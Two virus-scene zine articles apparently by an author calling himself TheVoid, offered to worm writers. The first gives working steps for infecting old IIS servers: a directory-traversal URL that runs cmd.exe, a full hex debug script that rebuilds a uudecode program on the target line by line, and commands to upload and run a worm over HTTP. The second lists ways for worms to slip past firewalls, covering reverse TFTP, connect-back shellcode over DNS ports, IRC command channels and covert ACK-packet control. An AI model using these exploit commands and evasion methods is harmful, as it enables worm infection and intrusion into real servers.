ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPLOADING.TXT]ÄÄÄ -=[ Biocode uploading using only HTTP. ]=- by TheVoid '11111010001 Introduction -=-=-=-=-=-= Hehe, today, a big ammount of IIS servers around the world are being infected by a lot of worms, those worms exploits one of the thousand million bugs who has the Internet Information Server of Micro$oft, but all of them had the same manner of upload his own code, using the fucking TFTP ... Starrings : [A] -> Worm [B] -> Infected server [C] -> Vulnerable server to infect Current scenario : [B] -------=( Vulnerable explotation technique )=------> [C] (exec TFTP against B) [B] <------=( TFTP GET WORM )=-------------------------- [C] [B] -------=( Exec downloaded worm )=------------------> [C] [B] (Infected) [C] (Infected) Well, in this scenario we need a reverse TFTP connection from the server to infect the vulnerable machine ... hehehehehehe UNTIL NOW ! One night, GriY0 and I smoke too much, and talking about some interesting things on his home we thought about the posibility of uploading code to the server using another way. Pay attention ... x) It will be interesting ... The theory -=-=-=-=-= Today, every retarded on this planet can hack a vulnerable IIS server ... simply opening his web browser and sending something like : -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- http://www.retards.org/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+"I'm%20a%20retarded" -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- He can exec a command on the server ... well, now the retarded knows that using something like .. ummm ... TFTP he can upload or download files from the server ... well, everything it's ok. Now the worm, executing something like the same URL used by the retarded can transfer his code to the vulnerable server and if he is lucky, another server will be infected. But whit this technique you have some BIG problems : Problem 0x00 -> A firewall, a firewall in front of [B] or [C] will drop UDP packets used by the TFTP program and the infection is finished :( Problem 0x01 -> If B is behind a masqueraded network any server on internet can connect to the port used by the worm's TFTP server :( Problem 0x02 -> The worm has to listen on a port (69 UDP) for the TFTP. Hehe, if somebody in the server execs a netstat, he will see the port opened. :( The technique -=-=-=-=-=-=- But you can use another way to upload code to the server! Well, we until now know that you can exec a command on the server, can not? well, why we cannot exploit this to write the code on the victim's hard disk ? "Exploit technique could be : http://www.server.com/scripts/..%c0%af../" [+] Infection phase 1 ---> We copy the cmd.exe to another directory and with another name ... http://exploittechnique/winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe [+] Infection phase 2 ---> We upload the first code ... an uudecode program encoded into a debug script :) how? Line per line ;) The debug script to create the uudecode.com is the next one : --- BEGIN OF UUDECODE.SCR --- E100 EB 54 90 49 6E 70 75 74 20 66 69 6C 65 20 65 72 E110 72 6F 72 2E 0D 0A 4F 75 74 70 75 74 20 66 69 6C E120 65 20 65 72 72 6F 72 2E 0D 0A 73 74 61 72 74 20 E130 6E 6F 74 20 66 6F 75 6E 64 2E 0D 0A 45 6E 64 20 E140 6E 6F 74 20 66 6F 75 6E 64 2E 0D 0A 00 00 00 00 E150 64 03 64 03 14 03 E8 BE 01 E8 2D 01 BF 14 03 E8 E160 AA 00 AD 3D 62 65 75 F4 AD 3D 67 69 75 EE AD 3D E170 6E 20 75 E8 BF 14 03 AC 3A C4 76 FB AC 3A C4 75 E180 FB AC 3A C4 76 FB 3A C4 74 04 AA AC EB F8 BA 14 E190 03 33 C9 88 0D B4 3C CD 21 73 03 E9 E3 00 A3 4E E1A0 01 BF 14 03 E8 65 00 AC 0A C0 74 48 BB 20 20 2A E1B0 C3 0A C0 74 3F 32 E4 8B E8 B9 04 06 AC 8A E0 AC E1C0 8A D0 2B C3 D0 E4 D0 E4 D2 E8 0A C4 AA 4D 74 D4 E1D0 8A E2 AC 8A D0 2B C3 D2 E4 D0 E8 D0 E8 0A C4 AA E1E0 4D 74 C1 8A E2 AC 2B C3 8A CD D2 E4 0A C4 AA 4D E1F0 75 C7 EB B0 E8 15 00 AD 3D 65 6E 75 05 AC 3C 64 E200 74 03 E8 B0 00 E8 61 00 B4 4C CD 21 8B 36 50 01 E210 89 3E 54 01 BD 50 00 BF C4 02 33 C0 AB B9 27 00 E220 B8 20 20 F3 AB BF C4 02 3B 36 52 01 72 06 E8 38 E230 00 E8 55 00 AC 3C 60 75 04 B0 20 EB 08 3C 0D 74 E240 1B 3C 0A 74 18 AA 4D 75 DF 3B 36 52 01 72 03 E8 E250 37 00 AC 3C 0A 75 F2 BF 14 03 EB B4 46 89 36 50 E260 01 8B 3E 54 01 BE C4 02 C3 BA 14 03 8B CA 87 0E E270 54 01 2B CA 76 0A 8B 1E 4E 01 B4 40 CD 21 72 01 E280 C3 BA 16 01 B9 14 00 EB 24 BA 64 03 B9 64 05 F7 E290 D1 8B 1E 4C 01 B4 3F CD 21 72 0C 0B C0 74 08 8B E2A0 F2 03 C6 A3 52 01 C3 BA 03 01 B9 13 00 50 E8 0A E2B0 00 58 E9 53 FF BA 3C 01 B9 10 00 BB 02 00 B4 40 E2C0 CD 21 C3 90 54 68 69 73 20 50 72 6F 67 72 61 6D E2D0 20 52 65 71 75 69 72 65 73 20 44 4F 53 20 56 65 E2E0 72 73 69 6F 6E 20 32 2E 30 20 6F 72 20 68 69 67 E2F0 68 65 72 2E 0D 0A 24 0D 0A 49 6E 70 75 74 20 70 E300 61 74 68 2F 66 69 6C 65 3A 20 20 4E 6F 20 61 63 E310 74 69 6F 6E 0D 0A 24 B4 30 CD 21 3C 02 73 0C BA E320 C4 02 B4 09 CD 21 B8 01 4C CD 21 BE 80 00 BF 84 E330 03 FC AC 0A C0 74 15 B4 20 AC 3A C4 76 FB 3A C4 E340 76 04 AA AC EB F8 81 FF 84 03 77 1C BA F7 02 B9 E350 14 00 BB 02 00 B4 40 CD 21 8B D7 B9 50 00 33 DB E360 B4 3F CD 21 03 F8 4F 4F BA 84 03 3B FA 77 05 BA E370 0B 03 EB AE B8 00 3D 88 05 CD 21 72 04 A3 4C 01 E380 C3 E9 23 FF DA Rcx 0284 N uudecode.com W Q ----EOF---- So, to upload it, we use the next command : ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- http://explotationtechnique/inetpub/scripts/cmd1.exe?/c+echo+ "E100%20EB%2054%2090%2049%206E%2070%2075%2074%2020%2066%2069%206C%2065%2020%2065%2072"+>>uudecode.scr ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- With this we have written the first line of the uudecode.scr :) and we will do the same with every line of the script until we have created the file debug.scr on the server ;) [+] Infecting phase 3 ---> Now, we have the debug.scr script on the server, so, now we have to convert it on code :) Executing the command : "debug < uudecode.scr" with the next command : ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- http://exploittechnique/inetpub/scripts/cmd1.exe?/c+debug+" Now, the worm has to uuencode his own file and with the same technique used to upload uudecode.scr, it can upload himself to the server :) To a file called for example worm.uu Now we send the command : uudecode worm.uu and WE OBTAIN AN EXE ... THE WORM ! [+] Infecting phase 5 ---> Exec the uploaded exe with another command, and ... another server infected !!.... -> Without using TFTP We only use HTTP Request to upload a text file ("echo line>>file") -> Bypassing Firewalls We are making HTTP Request, so if there is a firewall he has to allow traffic xDDDDDDDDDDDDDDDDDDDDDD Phase 1 : [A] ----=( Copy cmd.exe to another directory )=-----> [C] Phase 2 : [A] ----=( Upload uudecode.scr line per line )=-----> [C] Phase 3 : [A] ----=( Create uudecode.com with debug )=-----> [C] Phase 4 : [A] ----=( Upload his uuencoded code to C )=-----> [C] Phase 5 : [A] ----=( Uudecode his code and exec it )=-----> [C] The ending -=-=-=-=-= It's a very very easy way to infect a server with code without using anything else than the worm's own code :) I hope that this technique helps somebody. :) I am going to smoke something ... uhm... for example the cat xDDDDDDDDDDDDDD ._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._ Remember Luke, USE THE DRUGS ! The Void. (thevoid@pobox.co.uk) EOF ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPLOADING.TXT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FIREWALL.TXT]ÄÄÄ -=[ Firewall bypassing techniques for wormies. ]=- by TheVoid '11111010001 Introduction -=-=-=-=-=-= Wormie - Hahahahaha, I'm a letal worm and i will infect this server ... Server - U are a little bit retarded, maybe me too, but i have a big friend and he will fuck you. Wormie - Who is SHE ? Server - His name is Mr Firewall and he will kill you big box of communist shit ! Firie - Oh yeah ! Wormie - Begining reverse TFTP connection ... CRUNCH ! ._.-. EOF Well, drugs are bad ... xD ... NAH ! In this article i will expose some techniques to try to bypass the fucking firewall betwen ... Case 1 -> Your worm and the server to infect Case 2 -> Your worm and you Case 3 -> Your worm and the rest of the world I hope you enjoy ... A real scenario -=-=-=-=-=-=-=- [A] --> IIS Server (For example) infected by your worm [B] --> Server to infect [C] --> The fucking firewall -> In an insecure scenario without the firewall the infection could be something like ... [A] ---------------=( FTP Upload )=--------------------------------> [B] [A] ---=(Some exploitation technique to exec commands on server)=--> [B] [A] ---------------=( Exec code uploaded )=------------------------> [B] [A] (Infected) [B] (Infected) -> In a secure scenario with a firewall ... [A] ---=(Some exploitation technique to exec commands on server)=--> [B] [A] -----=( FTP Upload )=------>[C] [B] \___TRAFFIC DROPED [A] (Uh, what?) [B] (Uninfected) Case 1 ( Bypass a firewall betwen the server to infect and your worm ) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= In this case the incomming traffic to the server to infect allowed is only to DST_PORT 80 and in some cases 443 (For example). Solution 1) Well, we cant do an FTP and upload the worm code to the server so ... in this case we will make a reverse TFTP connection to our infected server and the vulnerable server will download the worm code to himself. Later simply exec the worm code and another infected machine. [A] ---=(Some exploitation technique to exec commands on server)=--> [B] [A] <---------------=( TFTP Download )=----------------------------- [B] [A] ---------------=( Exec code downloaded )=----------------------> [B] [A] (Infected) [B] (Infected) In this case the firewall has to permit outgoing traffic to UDP DST_PORT 69. (Some firewalls only drops incomming traffic but allows all outgoing traffic) Solution 2) If the server is vulnerable to some kind of buffer overflow, and you can inject code in the server you can do a reverse connection to the infected server, download the code and exec it. [A] ---=( Some kind of buffer overflow and a connect shellcode )=--> [B] [A] <-------------------------- [C] <-------=(DST_PORT 53)=--------- [B] \___TRAFFIC ALLOWED (IS A DNS REQUEST !) [A] -----------------=( CODE DOWNLOAD )=---------------------------> [B] [A] ---------------=( Exec code downloaded )=----------------------> [B] [A] (Infected) [B] (Infected) In this case you can try the next DST_PORTs from the vulnerable server ... src_port -> 53 dst_port -> 53 proto -> UDP (DNS) src_port -> <1024 dst_port -> 80 proto -> TCP (HTTP) src_port -> <1024 dst_port -> 25 - 110 proto -> TCP (SMTP - POP3) Case 2 ( Bypass a firewall betwen you and the infected server with the worm ) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Well, we have now infected the server but ... if the worm has some trojan functions, how i can connect with it ? Solution 1) Well, if the fucking firewall allows outgoing traffic your worm can connect to (for example) an IRC server and accept commands from it. Or you can use for example the Usenet world xD (Like Vecna's Hybris). This is one of the most secure solutions, and you can control a big ammount of worms at the same time. Solution 2) Begin a reverse connection to your machine from the infected server. Is the better solution if you want to be jailed xD Solution 3) Send commands to the worm with a non stablished connection ... xD I will explain it ... Some firewalls only drops TCP packets with the SYN flag enabled ( The beggining of a connection ). In this example we will introduce a new element, [D] the guy who wants to connect to his worm. [D] ---------=( SYN DST_PORT(someone) )=-----> [C] [B] (Infected) \_ DROP [D] (Fuck !) Well, we are going to try to abuse the policy of only drop packets with the SYN flag. ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- We try to connect to port 99 of the server behind the firewall ... foo:/ # ./hping xxx.xxx.xxx.xxx -p 99 -S HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): 40 data bytes --- xxx.xxx.xxx.xxx hping statistic --- 5 packets tramitted, 0 packets received, 100% packet loss ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- All packets dropped .... Ok, we now will try to send packets with the ACK flag to the same port. ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- foo:/ # ./hping xxx.xxx.xxx.xxx -p 99 -A HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): 40 data bytes 60 bytes from xxx.xxx.xxx.xxx: flags=R seq=0 ttl=120 win=0 time=64.8 ms 60 bytes from xxx.xxx.xxx.xxx: flags=R seq=1 ttl=120 win=0 time=58.6 ms 60 bytes from xxx.xxx.xxx.xxx: flags=R seq=2 ttl=120 win=0 time=57.5 ms --- xxx.xxx.xxx.xxx hping statistic --- 3 packets tramitted, 3 packets received, 0% packet loss ._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- It works ! , the remote server responses, but with a RST flag packet, hehe ... In a normal way we cannot exploit this because to send data you first have to stablish a socket, and the only way to create a TCP connection is ... [D] -------=( SYN Packet )=---------> [B] [D] <------=( SYN-ACK Packet )=------ [B] [D] -------=( ACK Packet )=---------> [B] . . . . . CONNECTION STABLISHED . . . . . But if the first SYN packet is dropped by the firewall you cant connect to the worm ... x) hehe, or not ... We can send packets to the remote server and bypass the firewall if the packet is not a beggining of a connection, so, we will not create a connection... hehe If the worm in [B] can capture all the traffic that goes to the machine we have another try ... We can communicate with the worm sending for example an ACK with the command in the data payload of the packet, the worm can capture the packet, we will receive an RST packet because the connection is not stablished, but the worm has captured the command ... xD .-----> Not dropped because is not a SYN packet [D] -------=( ACK Packet with the command )=------ [C] -------> [B] [D] <------=( RST packet )=------------------------------------ [B] [D] [B] (Command: Die) A nice implementation of this system is made by Mixter on his Tribe Flood Network 2k. The client can talk with a zombie behind a firewall using packets with random flags and with the command cyphered on the data payload of the packet. The zombie captures all the traffic with destination the machine infected (without putting the interface in promiscuous mode), and search in the data payload of all the packets the commands to exec. And this solution has another good thing, because you dont have to listen on any port if the sysadmin search for listening ports on his machine, he will not discover the worm. Case 3 ( Bypass a firewall betwen the worm and the rest of the world ) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= If the worm needs to connect to any other system in the world it can do the next things ... Solution 1) Use as source port of the connection a port that will be open on the firewall as an incoming service and dst port any other port ... SRC_PORT -> 25 DST_PORT -> 6667 PROTO -> TCP .---> (This is an SMTP response, ok, allowing it) [B] -=( SRC_PORT(25), DST_PORT(6667))=----->[C]------> [X] For example if the firewall is bad configured and allows all outgoing traffic from port 25 (SMTP) to Internet you can use this to make any outgoing connection to any port, but remember, if there is real SMTP server on the machine you cant use the port 25 as source port without killing before the STMP server. x) Solution 2) Search for a modem in the machine ... xDDDDDDDD Well, is too late and i need to sleep, i hope that this article gave you some ideas to fuck those firewalls sysadmins. ._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._ Remember Luke, USE THE DRUGS ! The Void. EOF ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FIREWALL.TXT]ÄÄÄ